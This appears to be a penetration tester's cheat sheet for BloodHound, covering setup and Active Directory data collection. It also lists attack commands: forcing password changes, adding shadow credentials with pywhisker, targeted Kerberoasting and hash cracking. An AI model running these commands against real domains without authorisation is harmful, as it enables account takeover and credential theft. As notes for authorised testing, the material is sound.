Bloodhound CheatSheet
1.0 Installation
apt install bloodhound
2.0 Configuration
neo4j console
2025-01-03 14:44:26.560+0000 INFO Bolt enabled on localhost:7687.
2025-01-03 14:44:27.123+0000 INFO Remote interface available at http://localhost:7474/
2025-01-03 14:44:27.125+0000 INFO id:
Connect to http://localhost:7474/ and change default password from neo4j:neo4j
to something better.
3.0 Usage
Run with:
bloodhound
3.1 Collect AD Data
3.1.1 NetExec
nxc ldap $ip -u $user -p $pass
nxc ldap $ip -u $user -p $pass --bloodhound --collection All
nxc ldap $ip -u $user -p $pass --bloodhound --collection All --dns-server $dnsip
3.1.2 bloodhound.py
git clone https://github.com/dirkjanm/BloodHound.py
# Method 1 (DNS IP):
python bloodhound.py -d $domain.local -u $user -p $pass -c All,LoggedOn -dc $dcname.$domain.local --zip -ns $dnsip
# Method 2 (DNS Name):
python bloodhound.py -d $domain -c All,LoggedOn --zip -ns $dnsserv -u $user@$domain -p $pass
3.2 Attribute Attacks
3.2.1 ForceChangePassword
net rpc password $targetuser $targetpass -U 'domain.local/'$user'%'$pass -S 'domain.local'
3.2.2 GenericAll
Manipulate msDs-KeyCredentialLink and request TGT:
pywhisker -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
python targetedKerberoast.py -v -d 'domain.local' -u $user -p $pass
Afterwards, crack the hash with hashcat:
![[hashcat#1.2 Kerberos TGT]]
3.2.3 GenericWrite
4.0 Hints
- Mark all owned users as owned!
- Select user and check AD permissions
- Node info
- Transitive Object Control
- local admin
4.1 Custom Queries
git clone https://github.com/CompassSecurity/BloodHoundQueries
cd BloodHoundQueries
BloodHound_Custom_Queries_Merger
./bloodhound-customqueries-downloader
5.0 References
6.0 Tags
- #OS/Kali
- #Label/CheatSheet
- #public